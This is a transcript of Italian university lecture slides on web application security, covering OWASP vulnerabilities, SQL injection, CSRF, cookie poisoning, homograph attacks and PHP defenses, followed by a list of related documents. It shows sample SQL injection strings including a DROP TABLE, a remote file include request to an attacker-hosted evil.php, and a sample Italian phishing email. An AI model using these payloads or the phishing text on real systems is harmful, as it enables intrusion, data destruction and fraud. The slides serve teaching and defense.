Sicurezza delle applicazioni Web

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Sicurezza delle applicazioni Web"

Transcript

1 Sicurezza delle applicazioni Web

2 Sicurezza delle applicazioni web [ ] Web application security deals with the overall Web application architecture, logic, coding, and content of the Web application. In other words, Web applications security is not about operating system vulnerability or the security defects in your commercial products; it is about the vulnerabilities of your own software. [ ]

3 Concetti di WebAppSec Richiesta HTTP request (cleartext or SSL) Accept from ANY via HTTP/HTTPS Allow SQL SQL Databas e Risposta Web server App. server DataBase HTTP reply (HTML, Javascript, VBscript, etc) Transport layer HTTP/ HTTPS over TCP/IP Apache IIS Netscape etc Plugins: Perl C/C++ JSP, etc Database connection: ADO, ODBC, etc. OWASP

4 Vulnerabilità nelle applicazioni web OWASP(Open Web Application Security Project) mantiene la lista delle vulnerabilità più critiche di un'applicazione web Unvalidated Input Broken Access Control Broken Authentication and Session Management Cross Site Scripting (XSS) Flaws Buffer Overflow Injection Flaws Improper Error Handling Insecure Storage Denial of Service Insecure Configuration Management

5 Mancanza di controllo dell'input Le informazioni ricevute a seguito di una richiesta non vengono validate. Questa tecnica può essere utilizzata per accedere alla parte di back-end Prima regola: non fidarsi mai delle informazioni fornite dal client nelle richieste HTTP (cookie, ID di sessione, parametri, header, referer)

6 Mancanza di controllo dell'input Parametri da controllare Il tipo di dato (string, integer, real, etc ) Il set di caratteri consentito La lunghezza minima e massima Controllare se è permesso il tipo NULL Controllare se il parametro è richiesto o meno Intervallo numerico

7 Unvalidated Input esempio (1) Manipolazione dei parametri inviati: Hidden Field Manipulation OWASP

8 Unvalidated Input esempio (2) Altero il valore in OWASP

9 Unvalidated Input esempio (3) OWASP

10 Unvalidated Input esempio (4) OWASP

11 Autenticazione insufficiente Avviene quando un attaccante può accedere ad informazioni riservate senza autenticarsi. Gli strumenti di amministrazione via web forniscono un esempio di accesso ad informazioni riservate Qualche volta le risorse sono protette nascondendo l'url che permette l'accesso ad un'area protetta che di solito viene messa nella directory /admin

12 Autenticazione insufficiente Si tratta di un approccio del tipo Security Through Obscurity. Anche se la risorsa non è direttamente accessibile, non vuol dire che sia davvero protetta L'URL potrebbe essere scoperta mediante un attacco brute force che prova i nomi di file e directory più comuni, attraverso l'analisi di messaggi di errore, dei file di log

13 Semantic URL attack Cosa succede se cambiamo il valore del parametro user?

14 File Upload attack <form action= upload.php method= POST enctype= multipart/form-data > <input type= file name= attchment > <input type= hidden name= MAX_FILE_SIZE value= 1024 > </form> Lato server si devono prendere provvedimenti per forzare la dimensione massima dei file che si possono copiare (in PHP esistono le direttive upload_max_filesize, post_max_size)

15 Broken Authentication Meccanismi di autenticazione non adeguati OWASP

16 Broken Authentication (2) OWASP

17 Referer spoofing Il campo referer dell'header HTTP contiene l'url di provenienza della richiesta Se un sito protegge le pagine consentendone la visualizzazione quando la richiesta proviene da un determinato insieme di URL, recuperando uno dei referer validi è possibile forgiare una richiesta che sarà accettata dal server

18 Gestione delle sessioni In alcuni casi i siti web permettono di riutilizzare vecchie sessioni senza farle scadere in modo appropriato - per fornire l'accesso ad un'area protetta Un attaccante potrebbe intercettare un session ID attraverso uno sniffer di rete o un attacco di tipo cross-site scripting e riutilizzarlo per impersonare un altro utente In una postazione pubblica un attaccante, usando il pulsante Back del browser, potrebbe accedere alle pagine visitate in precedenza dalla vittima

19 Concetto di gestione della sessione nel mondo reale Mario Rossi Dipendente Banca A. Ferrari Num. 33 Firma: A.Ferrari Carta di identità Mario Rossi Buongiorno Mario Rossi Ticket #33 Verifica identità in base alla carta di identità Ticket #33: mi dia 1000 euro dal mio conto Tenga 1000 euro Sig. Rossi Verifica identità in base al ticket OWASP

20 Gestione della sessione web --Procedura di autenticazione-- Mario Rosssi Web Server [1] https://www.mia-banca.it [2] Invio form di autenticazione via HTTPS Username/password Cookie=TWFyaW8123 Token di autenticazione [3] inserisce username/password via HTTPS [4] Welcome page personale e Set Cookie=TWFyaW8123 Verifica credenziali: se ok client autenticato Generazione del cookie --Richieste seguenti-- [5] Richiesta dell estratto CC (https://www. mia-banca.it/cont.jsp) [6] Invio del contenuto Cookie=TWFyaW8123 Verifica del cookie: Identifica il mittente Invio del contenuto al DEST OWASP

21 Furto di identità Mario Rossi Se altero la GET HTTP, forgiando il cookie sono in grado di accedere al contenuto di un altra persona Per implementare una corretta gestione delle sessioni è necessario proteggere sia le credenziali di autenticazione di un utente che i token di sessione generati dal server ed assegnati all utente [5a]Richiesta dell estratto CC (https://www. mia-banca.it/cont.jsp) Cookie=TWFyaW8122 [6a] Invio del contenuto di Paolo Verdi Verifica del cookie: TWFyaW8122 Identifica il mittente Paolo Verdi Invio del contenuto di Paolo Verdi al destinatario Mario Rossi I dati relativi all utenza di Verdi non sono stati adeguatamente protetti OWASP

22 SQL Injection SQL Injection is a technique for exploiting web applications that use clientsupported data in SQL queries without stripping potentially harmful characters first

23 SQL Injection $sql = SELECT * FROM client WHERE username=. $_POST['username']. AND password=. $_POST['password']. ; Esempi SELECT * FROM client WHERE username= Rossi AND password= **** SELECT * FROM client WHERE username= Rossi OR 1=1 -- Commento in molti DBMS!

24 SQL Injection (in ASP)

25 SQL Injection Username:rossi, Password:******* Username:verdi, Password:******* Username: OR = Passowrd: OR = SELECT * FROM client WHERE username= OR = AND password= OR = true!!

26 SQL Injection (in ASP)

27 SQL Injection Username: ; DROP TABLE clienti-- (per Transact-SQL, usato da SQL server) userid: 123; shutdown-- Per saperne di più

28 Soluzione? Validare sempre molto bene i dati in input usando, se possibile, le espressioni regolari Suggerimento: considerate quali sono i dati validi e rifiutate tutto il resto

29 Cross-Site Request Forgeries Permette ad un attaccante di far spedire richieste HTTP arbitrarie alla vittima <html> <body> testo qui testo qui testo qui<br/> <img src="http://.../compra.php? item=penne&quantity=10"> </body> </html>

30 Cross-Site Request Forgeries File compra.php <?php // controllo sessione $item = $_REQUEST['item']; $quantity = $_REQUEST['quantity']; $out = "Ho appena ricevuto un ordine per $quantity $item!!!\n"; $fp=fopen('ordini.txt','a'); fwrite($fp,$out); fclose($fp);?>

31 Cross-Site Request Forgeries Come difendersi? Non usare $_REQUEST ma scegliere $_POST oppure $_GET Verificare che i dati arrivino davvero dal form che è stato predisposto Si può introdurre nei form un valid token, per esempio un numero generato in modo casuale o un timestamp che viene anche memorizzato in una variabile di sessione dell'utente

32 Web cookies: not just a privacy risk DoubleClick (e altri) usa i cookie per tracciare gli utenti e per mandare messaggi pubblicitari mirati. Ma questo non è un vero pericolo Il pericolo nasce quando i cookie vengono usati per l'autenticazione e, soprattutto, quando vengono fornite informazioni personalizzate

33 Web cookies: not just a privacy risk La specifica dei cookie si basa infatti su un'idea di collaborazione tra browser e server e molti siti non salvano i cookie in modo sicuro Diventa facile forgiare un nuovo cookie per impersonare un altro utente Quindi, è opportuno non affidarsi mai al solo meccanismo dei cookie per restituire informazioni sensibili

34 Errata gestione della sessione - Furto di identità Cookie poisoning Alterando campi forniti al client tramite un cookie (stato), un attaccante può impersonare un utente per accedere a servizi web. Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30gmt ; Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30gmt ; Cookie guessable Cookie:aefdsg6757nb90 ; M.Rossi Cookie:aefdsg6757nb92 ; G.Verdi Cookie:aefdsg6757nb9? ; V.Bianchi OWASP

35 Homograph Attack Il problema sorge a causa dell'equivalenza visiva tra le lettere di alfabeti diversi Siamo abituati a confondere 0 (zero) con O (o maiuscola) ma esistono altri caratteri che pur essendo visivamente simili, sono semanticamente molto diversi! Nel cirillico ci sono per esempio le lettere a, c, e, p, y, x,

36 Homograph Attack John Hacker imita il nome del sito web della vostra banca Installa un proxy che instrada in modo trasparente tutte le vostre richieste alla vostra banca Inserisce il suo link nei portali più importanti

37 Homograph Attack Poiché la maggior parte delle volte clicchiamo sui link e non li scriviamo direttamente nella location bar John Hacker ha accesso a login e password dei clienti della banca Per saperne di più

38 Phishing Tecnica di ingegneria sociale utilizzata per ottenere l'accesso ad informazioni personali e riservate con la finalità del furto di identità, mediante l'utilizzo di messaggi di posta elettronica fasulli oppurtunamente creati per apparire autentici

39 Esempio di phishing Cari clienti della banca via Internet Imprese. Vorremmo informarvi l'indirizzo fisso del nuovo web server del servizio online banking - A causa sovraccarico del nostro generale server la nostra zona tecnica e allargata con l'aggiunta di nuovo server attualmente nella fase di test. Vi pregiamo essere soggetti alla procedura obbligatoria d'autenticazione al nuovo server per far transferire i Vostri dati d'utente con successo alla base dei dati del nuovo piu protetto server del servizio online banking. continua

40 Esempio di phishing 1.Aprite la web pagina 2.Inserite nel Vostro conto online usando la combinazione Codice i Pin. 3.Per evitare la perdita dei Vostri dati personali e per la protezione contro assalti di "Phishing" si prega di sempre chiudere la finestra del Vostro Internet Browser al termine di lavori con la banca online. Vi pregiamo distinti saluti, il servizio d'assistenza tecnica della banca online ByBank

41 Rappresentazione canonica Do not make any security decision based on the name of a resource, especially a filename Esistono nomi diversi per identificare la stessa risorsa /home/stud/2000s000/index.html ~2000s000/index.html /home/../home/stud/ Il nome canonico è quello più semplice (lo standard)

42 Bypassing Napster Name Filtering Canonicalization bug Il blocco delle canzoni è stato fatto sulla base del nome della canzone e non ci è voluto molto a bypassare il filtro.. changes the file names of songs inside a person's Napster directory into a spelling inspired by Pig Latin. The Radiohead song "Karma Police," for example, would be transformed into "armak olicep."

43 Come possiamo difenderci?

44 Difesa in profondità Si tratta di un principio ben noto tra i professionisti di sicurezza E importante avere delle salvaguardie ridondanti. Per esempio è una buona pratica richiedere nuovamente la password ad un utente autenticato quando si devono svolgere azioni importanti

45 Minimo Privilegio Fornire privilegi non necessari può aumentare i rischi di una applicazione Lo abbiamo visto quando abbiamo discusso i privilegi degli utenti di MySQL

46 Minimizzare l'esposizione Le applicazioni web richiedono comunicazioni frequenti con sorgenti di dati remote Diventa importante fare il tracking dei dati per capire quali sono i dati esposti Ad esempio, nel caso di pagamento con carta di credito si dovrebbe usare SSL per proteggere la fase di verifica delle informazioni sulla carta di credito perché queste vengono mandate al client e quindi esposte nella rete Internet

47 Tracciare i dati Bisogna distinguere tra i dati dei quali ci si può fidare e di quelli che invece non sono fidati Si deve capire quali sono i dati che entrano nell'applicazione e quali sono i dati che escono Es: echo -> dati in uscita mysql_query -> dati in ingresso al database

48 Filtrare l'input Identificare l'input Filtrare l'input Distinguere tra input filtrato e input non filtrato (tainted)

49 In PHP: Register Globals Con la direttiva register_globals = On vengono create in automatico delle variabili globali a partire da molte sorgenti remote (moduli, database, cookie, sessioni) Se abilitata, questa direttiva nasconde l'origine dei dati e questo può aprire delle vulnerabilità nel codice PHP

50 Esempio: PHP File Include Attack Con le register globals = On viene creata la variabile $name inizializzata al valore 'value' La funzione include() di PHP permette anche di includere file esterni

51 Esempio: PHP File Include Attack <?php include($vuln);?> 1) GET /a.php?vuln=http://webhost.com/evil.php attacker target 4) Output of evil.php is sent to the attacker webhost.com 2) Target makes request to webhost.com/evil.php 3) The malicious PHP file 'evil.php' is sent to the Target and is executed by the include() function.

52 In PHP: Filtrare l'input Gli array superglobali permettono di identificare l'origine dei dati ($_POST, $_GET, $_COOKIES, ) Anche $_SERVER contiene dati in arrivo dall esterno che possono essere manipolati $_SESSION Dati in arrivo dai database

53 In PHP: Filtrare l'input Non si deve mai cercare di correggere i dati in arrivo, ma si deve obbligare l utente ad inserire dati corretti Si possono usare convenzioni nei nomi per distingure tra dati filtrati e dati non filtrati. Ad esempio, si possono copiare i dati filtrati in un array $clean[] e usare solo i dati in questo array per la logica dell applicazione (NB. l'array $clean[] va inizializzato!)

54 In PHP: Escape dell'output Identificare l'output (echo, printf, print, <?=) Escape dell'output Dipende ovviamente dal tipo di sistema cui si spediscono i dati. Ad esempio, nel caso del browser, si può usare la funzione htmlentities(). Nel caso di MySQL, se non esiste una funzione di escape nativa si può usare la funzione addslashes() Distinguere tra dati escaped e dati non escaped

55 In PHP: Error Reporting Non si dovrebbero mai rendere pubbliche le informazioni che vengono restituite da PHP in caso di errore Nel file php.ini display_errors = Off log_errors = On error_log = nomefile error_reporting = E_ALL Da programma PHP <? ini_set( display_errors, Off ); ini_set( log_errors, On ); ini_set( error_log, /usr/local/ ); ini_set( error_reporting, E_ALL );?>

56 Insecure Configuration Management È diffusa la pratica di non eliminare oggetti o codici sorgenti non più necessari per l erogazione del servizio dai quali è spesso possibile ottenere informazioni critiche per il sistema. Vulnerabiltà note non corrette all interno dei software installati nel server Vulnerabilità all interno dei software installati nel server oppure configurazioni errate che permettono di eseguire attacchi Presenza di contenuti non necessari quali pagine di defaut, backup di dati, script, applicazioni, file di configurazione e vecchie pagine web Come proteggersi? Eliminare tutto ciò che non è necessario OWASP

57 Il problema è sociale... [...]is much easier to trick someone into giving a password for a system than to spend the effort to hack into the system. [...] it was the single most effective method in my arsenal. Kevin Mitnick

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

SQL Injection. Homograph Attack. Cross-Site Scripting. SQL Injection

SQL Injection. Homograph Attack. Cross-Site Scripting. SQL Injection SQL Injection SQL Injection Homograph Attack Cross-Site Scripting SQL Injection is a technique for exploiting web applications that use clientsupported data in SQL queries without stripping potentially

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Attacchi Web. Davide Marrone

Attacchi Web. Davide Marrone <davide@security.dico.unimi.it> Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento di Informatica e Comunicazione 22 gennaio 2007 Sommario Classificazione

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza

Dettagli

WHITE PAPER Per Sql-Injection si intendono comunemente tutti quegli attacchi ad un'applicazione, solitamente Web, in cui il programma esegue query su di un database SQL utilizzando variabili passate dall'utente

Dettagli

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: attacchi web Alessandro Reina Aristide Fattori

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

PHP Secure Programming

PHP Secure Programming PHP Secure Programming Seminario sviluppato nell'ambito del corso di Sicurezza, Dipartimento di Informatica e Scienze dell'informazione (DISI), Genova Autore: Matteo Greco

Dettagli

Web Application (In)Security

Web Application (In)Security Web Application (In)Security Alessandro jekil Tanasi alessandro@tanasi.it http://www.tanasi.it LUG Trieste Introduzione.. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ..no

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Versione 2 Milano 14 Luglio 2006 Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28 Indice 25 184 Introduzione XI Capitolo 1 Impostazione dell ambiente di sviluppo 2 1.1 Introduzione ai siti Web dinamici 2 1.2 Impostazione dell ambiente di sviluppo 4 1.3 Scaricamento di Apache 6 1.4 Installazione

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

Cookie (1) - Componenti

Cookie (1) - Componenti Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

RenderCAD S.r.l. Formazione

RenderCAD S.r.l. Formazione Corso Descrizione La durata di questo corso è complessivamente di ore 150 di cui 85 ore di teoria, 35 ore di pratica e 30 ore di stage in azienda. Nel nostro territorio esiste una richiesta di tale figura,

Dettagli

Programmazione Web. Laboratorio 4: PHP e MySQL

Programmazione Web. Laboratorio 4: PHP e MySQL Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi

Dettagli

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1)

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Chiara Braghin chiara.braghin@unimi.it Le 2 maggiori vulnerabilità dei siti Web SQL Injection Il browser spedisce dell input

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

Apriti Sesamo Plus. Autenticazione Forte AntiPhishing portabilità e protezione dei dati

Apriti Sesamo Plus. Autenticazione Forte AntiPhishing portabilità e protezione dei dati Apriti Sesamo Plus come sistema di Autenticazione Forte AntiPhishing portabilità e protezione dei dati Massimo Penco mpenco@globaltrust.it 1 Sommario -line: il Phishing Una panoramica sulle tecniche più

Dettagli

MODULO 1 PARTE 3. Programmazione (scripting) server-side con PHP 3.c Cookies e sessioni. Goy - a.a. 2012/2013 Programmazione Web 1

MODULO 1 PARTE 3. Programmazione (scripting) server-side con PHP 3.c Cookies e sessioni. Goy - a.a. 2012/2013 Programmazione Web 1 MODULO 1 PARTE 3 Programmazione (scripting) server-side con PHP 3.c Cookies e sessioni Goy - a.a. 2012/2013 Programmazione Web 1 Cookie - I Cookie = variabili che il server salva (*) sul client come file

Dettagli

Il Protocollo HTTP e la programmazione di estensioni Web

Il Protocollo HTTP e la programmazione di estensioni Web Il Protocollo HTTP e la programmazione di estensioni Web 1 Il protocollo HTTP È il protocollo standard inizialmente ramite il quale i server Web rispondono alle richieste dei client (prevalentemente browser);

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011 IT Security Competence Center Web Application Security Tito Petronio SANS GCFA, GWAS Certified Professional 18 Febbraio 2011 Agenda Web Application Security OWASP Vulnerabilità delle Applicazioni Web Sicurezza

Dettagli

INSTALLAZIONE DI JOOMLA! Guida alla installazione di Joomla!

INSTALLAZIONE DI JOOMLA! Guida alla installazione di Joomla! Guida di Virtuemart INSTALLAZIONE DI JOOMLA! Guida alla installazione di Joomla! INDICE INDICE... 1 INTRODUZIONE... 2 DONWLOAD... 2 INSTALLAZIONE... 2 REQUISITI MINIMI... 3 PASSAGGIO 1... 4 PASSAGGIO 2...

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Creare un portale web con strumenti Open Source

Creare un portale web con strumenti Open Source Creare un portale web con strumenti Open Source Il caso di Arsié http://www.arsie.net 1/30 Lucia De Pasqual lucia@arsie.net BLUG - Belluno Linux User Group http://belluno.linux.it CMS e Portali Content

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Attacchi - panoramica

Attacchi - panoramica Attacchi - panoramica Metodi e strumenti per la Sicurezza informatica Claudio Telmon claudio@telmon.org Tecniche di attacco Più passaggi prima del destinatario (stepstones) Accesso da sistemi poco controllati

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Sicurezza WEB LINGUAGGI E APPLICAZIONI MULTIMEDIALI - ISTI Informa?on Science and Technology Ins?tute

Sicurezza WEB LINGUAGGI E APPLICAZIONI MULTIMEDIALI - ISTI Informa?on Science and Technology Ins?tute Sicurezza WEB LINGUAGGI E APPLICAZIONI MULTIMEDIALI - Maurizio Maffi ISTI Informa?on Science and Technology Ins?tute Sicurezza Web Programmando applicazioni Web based bisogna sempre tenere in considerazione

Dettagli

Vulnerabilità informatiche (semplici)..

Vulnerabilità informatiche (semplici).. Vulnerabilità informatiche (semplici).. in infrastrutture complesse....il contenuto di questo speech è di pura fantasia, ogni riferimento a infrastrutture reali o fatti realmente accaduti è puramente casuale

Dettagli

OWASP Web Application Penetration Checklist. Versione 1.1

OWASP Web Application Penetration Checklist. Versione 1.1 Versione 1.1 14 Luglio 2004 Questo documento è rilasciato sotto la licenza GNU, e il copyright è proprietà della Fondazione OWASP. Siete pregati di leggere e comprendere le condizioni contenute in tale

Dettagli

--- PREMESSE INTRODUZIONE. .:luxx:.

--- PREMESSE INTRODUZIONE. .:luxx:. SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una

